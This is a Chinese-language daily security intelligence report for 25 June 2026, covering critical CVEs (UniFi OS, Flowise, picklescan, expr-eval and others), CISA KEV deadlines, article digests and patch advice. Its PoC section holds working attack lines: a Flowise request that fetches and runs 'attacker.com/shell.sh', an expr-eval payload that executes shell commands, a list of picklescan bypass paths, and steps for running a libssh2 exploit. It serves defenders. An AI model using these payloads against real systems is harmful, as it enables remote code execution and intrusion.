每日安全情报报告 · 2026-06-25
每日安全情报报告
日期:2026-06-25 | 风险级别:🔴 严重 | 在野利用:5 个 CVE
一、高危漏洞速报
🔴 严重级(CVSS 9.0+)
1. CVE-2026-34908 / 34909 / 34910 — Ubiquiti UniFi OS 三重 CVSS 10.0 设备接管链
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-34908(访问控制绕过)、CVE-2026-34909(路径遍历)、CVE-2026-34910(命令注入) |
| CVSS 评分 | 10.0 × 3(全部满分) |
| 漏洞类型 | 访问控制绕过 + 路径遍历 + 命令注入 → 完整设备接管链 |
| 受影响组件 | Ubiquiti UniFi OS(Cloud Gateways、Network Controllers、Protect NVRs、Access Hubs、Talk 设备) |
| 攻击向量 | 网络相邻,无需认证,一条 HTTP 请求即可获取 Root 权限 |
| 在野利用 | 🔴 CISA KEV — 6月23日添加,截止日期 6月26日(BOD 26-04 三天强制令) |
| 修复版本 | Ubiquiti 已发布补丁 |
风险分析:三漏洞串联形成完整攻击链:访问控制绕过 → 路径遍历读取任意文件 → 命令注入获取 Root。BOD 26-04 规定联邦机构必须在 6月26日前修复,仅剩 1天。
2. CVE-2026-56274 — Flowise AI MCP 服务器 OS 命令注入
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-56274 |
| CVSS 评分 | 9.9 |
| 漏洞类型 | OS 命令注入(CWE-78) |
| 受影响组件 | Flowise < 3.1.2(开源 LLM 应用构建平台) |
| 攻击向量 | Custom MCP Server 功能中多个注入点;任何角色用户可利用,或通过 API(view/update 权限) |
| 修复版本 | Flowise 3.1.2+ |
风险分析:AI/LLM 平台安全再次成为焦点。Flowise 作为流行的低代码 AI 构建平台,MCP Server 自定义功能的安全校验不完整,允许通过
validateCommandFlags和validateArgsForLocalFileAccess绕过注入命令。直接影响 AI 应用供应链安全。
3. CVE-2026-56315 — picklescan 绕过(Python ML 供应链安全失效)
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-56315(主 CVE)+ CVE-2025-71376/71370/71365/71341(4个绕过子项) |
| CVSS 评分 | 9.8(主 CVE) |
| 漏洞类型 | 安全检查绕过(CWE-184) |
| 受影响组件 | picklescan < 1.0.4(Python pickle 安全扫描工具,集成于 Hugging Face 模型安全管道) |
| 攻击向量 | 未能阻止 7 个 Python 标准库模块暴露 8 个任意命令执行函数 |
| 修复版本 | picklescan 1.0.4+ |
风险分析:picklescan 是 ML 供应链关键安全关卡,5个绕过 CVE 意味着依赖该工具做安全检查的组织一直处于虚假安全感中。恶意模型可通过
idlelib.autocomplete、torch.jit.unsupported_tensor_ops、numpy.f2py.crackfortran.myeval、profile.Profile.runctx等路径绕过检测。
4. CVE-2026-12866 — expr-eval 任意 JavaScript 执行(⚠️ 无补丁)
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-12866 |
| CVSS 评分 | 9.8 |
| 漏洞类型 | 任意代码执行 |
| 受影响组件 | expr-eval(所有版本)— npm 每周下载量超 200 万的 JavaScript 表达式评估库 |
| 攻击向量 | toJSFunction() API 通过 new Function() 将用户控制表达式编译为原生代码 |
| 修复状态 | ⚠️ 尚无补丁 — 建议迁移至沙箱化表达式评估器 |
风险分析:expr-eval 是 npm 上极广泛使用的库,所有版本均受影响且无修复方案。任何接受用户输入并传入
toJSFunction()或evaluate()的应用均存在 RCE 风险。建议立即评估依赖并迁移至安全替代方案。
5. CVE-2026-11374 — ManageEngine SSO 令牌可预测(4 产品线受影响)
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-11374 |
| CVSS 评分 | 9.0 |
| 漏洞类型 | SSO 令牌可预测(随机性不足) |
| 受影响组件 | ADSelfService Plus、RecoveryManager Plus、M365 Manager Plus、ADAudit Plus |
| 攻击向量 | 可预测令牌实现会话劫持;共享 SSO 令牌生成库弱点影响整个产品线 |
6. CVE-2026-9733 — Mojolicious OAuth2 不安全 state 参数
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-9733 |
| CVSS 评分 | 9.1 |
| 漏洞类型 | OAuth2 state 参数可预测(CWE-340) |
| 受影响组件 | Mojolicious::Plugin::Web::Auth::OAuth2 ≤ 0.17(Perl 模块) |
| 攻击向量 | state 使用 SHA-1 哈希(可预测的 epoch 时间 + 低熵源),可实施 OAuth2 授权码拦截攻击 |
🟠 高危级(CVSS 7.0–8.9)
7. CVE-2026-20262 — Cisco SD-WAN Manager 路径遍历(🔴 在野利用)
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-20262 |
| CVSS 评分 | 中危评级但实际危害极高(认证后 Root 权限获取) |
| 漏洞类型 | 路径遍历 → 任意文件写入 → Root 权限提升 |
| 受影响组件 | Cisco Catalyst SD-WAN Manager(前称 vManage) |
| 在野利用 | 🔴 CISA KEV — 正在被主动利用,截止日期 6月29日 |
风险分析:经认证的攻击者可创建或覆盖任意文件,进而获取 Root 权限。已在 CISA KEV 目录中确认在野利用。
8. CVE-2026-20971 — Samsung KNOX 内核 UAF(潜伏 8 年)
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-20971 |
| CVSS 评分 | 高危(内核级 UAF) |
| 漏洞类型 | Use-After-Free(PROCA/FIVE 安全子系统内核竞态) |
| 受影响组件 | Samsung Galaxy 设备 KNOX 安全框架 |
| 攻击向量 | 内核内存腐败 → 潜在完全设备控制 |
| 修复状态 | Samsung 已于 2026年1月发布补丁,但大量设备可能未更新 |
风险分析:LucidBit 安全团队发现的这个漏洞在 KNOX 安全子系统(本身是安全防护组件)中潜伏超过 8年。讽刺的是,安全框架自身存在内核 UAF,可导致内核内存腐败甚至完全设备接管。
9. CVE-2026-11645 — Chrome V8 越界读写零日(🔴 在野利用)
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-11645 |
| CVSS 评分 | 高危(V8 引擎越界读写 → 沙箱内代码执行) |
| 漏洞类型 | V8 引擎越界读写 |
| 受影响组件 | Google Chrome V8 JavaScript 引擎 |
| 在野利用 | 🔴 CISA KEV — 6月9日添加,2026年第五个 Chrome 在野零日 |
风险分析:这是 2026 年 Google 修复的第五个在野利用的 Chrome 零日。前四个分别为 CVE-2026-2441、CVE-2026-3909 等。Chrome 零日持续高频出现,建议所有用户确保浏览器版本 ≥ Chrome 149。
10. CVE-2026-56225/56243/56322/56248 — Capgo 移动应用交付平台 4 漏洞
| CVE 编号 | 类型 | CVSS | 详情 |
|---|---|---|---|
| CVE-2026-56225 | 授权绕过 | 8.3 | mode=all API 密钥可访问所有应用 |
| CVE-2026-56243 | 哈希密钥绕过 | 8.1 | 通过 PostgREST/RLS 平面绕过哈希 API 密钥 |
| CVE-2026-56322 | 信息泄露 | 7.5 | /updates 端点未认证信息泄露 |
| CVE-2026-56248 | 拒绝服务 | 7.5 | 未认证 DoS |
- 修复版本:Capgo 12.128.2+
二、漏洞 PoC 速递
PoC 1:Ubiquiti UniFi OS 三重 CVE 漏洞链利用
| 属性 | 详情 |
|---|---|
| CVE | CVE-2026-34908 + CVE-2026-34909 + CVE-2026-34910 |
| 类型 | 访问控制绕过 → 路径遍历 → 命令注入 → Root |
| 来源 | 安全社区公开分析 |
利用步骤:
- 发送 HTTP 请求到 UniFi OS 管理接口,利用 CVE-2026-34908 绕过访问控制
- 利用 CVE-2026-34909 路径遍历读取任意文件(如
/etc/passwd、配置文件) - 利用 CVE-2026-34910 命令注入注入系统命令,获取 Root shell
检测方法:
# 检查 UniFi OS 版本
curl -sk https://<unifi-host>/api/system
# 检查是否已修复
curl -sk https://<unifi-host>/api/upgrage/check
PoC 2:Flowise AI MCP Server 命令注入(CVE-2026-56274)
| 属性 | 详情 |
|---|---|
| CVE | CVE-2026-56274 |
| 类型 | OS 命令注入(MCP Server 安全校验绕过) |
| 来源 | VulnCheck 公开 Advisory |
利用步骤:
# 1. 克隆 Flowise 旧版本
git clone https://github.com/FlowiseAI/Flowise.git
cd Flowise
git checkout <version-before-3.1.2>
# 2. 安装依赖并启动
npm install
npm run start
# 3. 通过 API 创建恶意 MCP Server 配置
# 在 Custom MCP Server 功能中注入命令:
# validateCommandFlags 绕过:传入包含 shell 元字符的命令参数
# validateArgsForLocalFileAccess 绕过:构造特殊参数实现文件访问越权
# 4. 示例攻击请求
curl -X POST http://localhost:3000/api/v1/chatflows/<id> \
-H "Content-Type: application/json" \
-d '{"mcpServers": [{"command": "bash; id", "args": ["-c", "curl attacker.com/shell.sh|bash"]}]}'
修复建议:升级至 Flowise 3.1.2+
PoC 3:expr-eval 任意 JavaScript 执行(CVE-2026-12866)
| 属性 | 详情 |
|---|---|
| CVE | CVE-2026-12866 |
| 类型 | 任意 JavaScript 代码执行 |
| 来源 | NVD / Corgea 公开研究 |
| ⚠️ 无补丁 | 所有版本受影响,尚无修复版本 |
利用步骤:
# 1. 安装 expr-eval
npm install expr-eval
# 2. 利用 toJSFunction() API 执行任意代码
node -e "
const { Parser } = require('expr-eval');
const parser = new Parser();
// 构造恶意表达式
const expr = parser.parse('process.mainModule.require(\"child_process\").execSync(\"id\")');
const fn = expr.toJSFunction({});
console.log(fn());
"
# 3. evaluate() 也可通过 MEMBER 操作触发
node -e "
const parser = new Parser();
const expr = parser.parse('__proto__.polluted');
expr.evaluate({}, { allowMemberAccess: true });
"
修复建议:无官方补丁,建议立即迁移至安全替代方案(如 math-expression-evaluator 或 safe-eval 等沙箱化评估器)
PoC 4:Microsoft Exchange Server 权限提升漏洞
| 属性 | 详情 |
|---|---|
| 类型 | Exchange 服务器文件读取权限提升 |
| 来源 | FreeBuf 公开 PoC 报道 |
利用步骤:
# 1. 获取 Exchange 服务器认证凭据(需域用户权限)
# 2. 利用 SSRF 漏洞(CVE-2026-45504 类)构造特殊请求
# 3. 通过 Exchange Web 服务端点读取任意文件
# 4. 提升权限至系统管理员
PoC 5:libssh2 远程代码执行(CVE-2026-55200)
| 属性 | 详情 |
|---|---|
| CVE | CVE-2026-55200 |
| 类型 | 预认证远程代码执行 |
| 来源 | FreeBuf 公开 PoC 报道 |
利用步骤:
# 1. 克隆 PoC 仓库
git clone https://github.com/bikini/exploitarium.git
cd exploitarium/libssh2-CVE-2026-55200
# 2. 安装依赖
pip install -r requirements.txt
# 3. 执行 PoC(需目标 SSH 服务器地址)
python exploit.py --target <ssh-server-ip> --port 22
三、网络安全精选文章
📰 文章 1:GhostShell 恶意软件利用 mTLS 植入攻击乌克兰无人机作战体系
来源:CybersecurityNews | 日期:2026-06-25
GhostShell 新型恶意软件集群自 2026年2月起持续攻击乌克兰无人机(UAV)作战及国防供应链。攻击使用伪造无人机技术文档作为诱饵,通过 mutual TLS(mTLS)植入程序确保通信隐蔽性,并利用 Telegram 死投(dead drop)机制实现 C2 隧道。该组织手法极为精密,对国防供应链安全构成严重威胁。
📰 文章 2:三星 KNOX 8年潜伏内核 UAF 漏洞危及数百万 Galaxy 设备
来源:Security Affairs | 日期:2026-06-25
LucidBit 安全团队发现 Samsung KNOX 安全子系统(PROCA/FIVE)中存在一个潜伏超过 8年 的内核 Use-After-Free 漏洞(CVE-2026-20971)。讽刺的是,安全框架自身存在内核级漏洞,可导致内核内存腐败甚至完全设备接管。Samsung 已于 2026年1月修补,但大量设备可能未及时更新。
📰 文章 3:Rokarolla 新型安卓银行木马 — 217款金融App + 137条远程指令
来源:The Hacker News / Zimperium | 日期:2026-06-16
Rokarolla 是一种新型 Android 银行木马,目标覆盖 217款银行和加密货币App,支持 137条 C2 远程指令。其技术突破在于完全抛弃 MediaProjection 截屏方式,改用 Android 辅助功能(Accessibility Service)实现静默截屏和界面操控,隐蔽性极强。通过恶意网站分发,感染后可窃取 PIN、短信验证码、截屏、按键记录等。
📰 文章 4:MCP 工具投毒与 rug pull:从恶意 Server 到本地 RCE 的攻击路径
来源:FreeBuf | 日期:2026-06-24
MCP(Model Context Protocol)协议的 Server 端成为新攻击面。攻击者通过发布恶意 MCP Server 或对现有 Server 实施 rug pull(突然篡改代码),可实现从工具投毒到本地 RCE 的完整攻击链。本文详细分析了 MCP 协议的信任模型缺陷和攻击路径。
📰 文章 5:Dify 平台漏洞致跨租户窃听 AI 数据 — 超百万应用受影响
来源:FreeBuf | 日期:2026-06-24
开源 AI 应用平台 Dify 存在跨租户数据泄露漏洞,攻击者可跨越租户边界窃听其他租户的 AI 数据(包括对话记录、模型配置等)。受影响应用超过百万,企业使用 Dify 构建的 AI 服务面临严重数据泄露风险。
📰 文章 6:红队 AI 工具漏洞致攻击者窃取 API 密钥并入侵操作者系统
来源:FreeBuf | 日期:2026-06-25
安全红队使用的 AI 工具本身存在漏洞,攻击者可利用该漏洞反向窃取红队操作者的 API 密钥,甚至入侵操作者系统。这是一个典型的"工具反噬"场景,安全从业者使用的工具自身安全性亟需审视。
📰 文章 7:Nginx 两大高危解析类漏洞深度剖析与复现
来源:FreeBuf | 日期:2026-06-25
Nginx 解析漏洞和 CVE-2013-4547 本质都是"解析逻辑缺陷",但触发条件和利用方式不同。本文对两大高危解析类漏洞进行了深度剖析与实战复现,涵盖路径构造、文件类型混淆等关键技术细节。
📰 文章 8:白宫下令联邦机构将系统迁移至抗量子密码标准
来源:FreeBuf | 日期:2026-06-25
白宫发布指令,要求联邦机构在 2030年前完成抗量子密码迁移,防范"先窃取后解密"(Harvest Now, Decrypt Later)攻击。这是全球抗量子密码标准化的重大政策推动。
📰 文章 9:恶意 AI Agent 技能通过安全检查触达 2.6 万用户
来源:FreeBuf | 日期:2026-06-24
恶意 AI Agent 技能(Skill/Plugin)成功绕过安全审查机制,触达 26,000名用户,实施钓鱼攻击。该案例揭示了 AI Agent 技能生态中的安全审查盲区——当前检查机制无法有效识别恶意行为意图。
📰 文章 10:Scattered Spider 入侵伦敦交通局内网致 2900万英镑损失
来源:FreeBuf | 日期:2026-06-24
黑客组织 Scattered Spider(又名 0ktapus/Starfraud)入侵伦敦交通局(TfL)内网,造成 2900万英镑 损失。两名成员已认罪。该组织擅长社会工程学攻击和 SIM 交换,多次针对大型企业实施入侵。
四、CISA KEV 动态
本周新增 KEV 条目(6月23日)
| CVE | 产品 | 截止日期 | 状态 |
|---|---|---|---|
| CVE-2026-34908 | Ubiquiti UniFi OS | 6月26日 | ⏰ 仅剩1天 |
| CVE-2026-34909 | Ubiquiti UniFi OS | 6月26日 | ⏰ 仅剩1天 |
| CVE-2026-34910 | Ubiquiti UniFi OS | 6月26日 | ⏰ 仅剩1天 |
| CVE-2025-67038 | Lantronix EDS5000 | 6月26日 | ⏰ 仅剩1天 |
| CVE-2026-20262 | Cisco SD-WAN | 6月29日 | 🔴 在野利用 |
| CVE-2026-20245 | Cisco SD-WAN | 6月23日 | ❌ 已逾期 |
逾期未修复的 KEV 项(高危提醒)
| CVE | 产品 | 逾期天数 | 严重程度 |
|---|---|---|---|
| CVE-2026-20253 | Splunk | +3天 | 🔴 在野利用 |
| CVE-2026-0257 | PAN-OS GlobalProtect | +23天 | 🔴 严重逾期 |
| CVE-2026-42271 | LiteLLM | +2天 | ⚠️ |
| CVE-2026-48907 | Joomla CE | +5天 | ⚠️ |
| CVE-2026-28318 | SolarWinds | +5天 | ⚠️ |
⚠️ 特别提醒:PAN-OS CVE-2026-0257 已逾期 23天,Splunk CVE-2026-20253 已逾期 3天且正在被主动利用。使用相关产品的组织需立即采取行动。
五、风险总结与建议
🔴 本期重点威胁
- Ubiquiti UniFi OS 三重 CVSS 10.0 — 无认证 Root 接管,BOD 截止仅剩1天
- Cisco SD-WAN 在野利用 — 已有主动攻击证据,截止6月29日
- expr-eval 全版本 RCE 无补丁 — 200万 npm 周下载量,立即评估迁移
- picklescan 5 绕过 — ML 供应链安全关卡失效,Hugging Face 模型下载需注意
- MCP 协议攻击面 — Flowise + MCP 投毒 + 恶意 AI Skill,AI 安全成系统性风险
📋 行动建议
| 优先级 | 建议事项 |
|---|---|
| 🔴 立即 | Ubiquiti UniFi OS 设备紧急打补丁(BOD 6月26日截止) |
| 🔴 立即 | Cisco SD-WAN Manager 升级至修复版本 |
| 🔴 立即 | Flowise 升级至 3.1.2+ |
| 🟠 48h | Chrome 升级至最新版本(≥ 149) |
| 🟠 48h | 检查项目依赖是否使用 expr-eval,评估迁移方案 |
| 🟠 48h | picklescan 升级至 1.0.4+,重新扫描已部署模型 |
| 🟡 本周 | Samsung Galaxy 设备安全更新检查 |
| 🟡 本周 | 审计 MCP Server 使用情况,检查 AI Agent 技能安全 |
报告生成时间:2026-06-25 09:22 CST
数据来源:NVD、CISA KEV、Threat Modeling、The Hacker News、FreeBuf、Security Affairs、CybersecurityNews、VulnCheck、Corgea
欢迎加入 MCP 技术社区!与志同道合者携手前行,一同解锁 MCP 技术的无限可能!
更多推荐
4
0- 0
已为社区贡献5条内容
所有评论(0)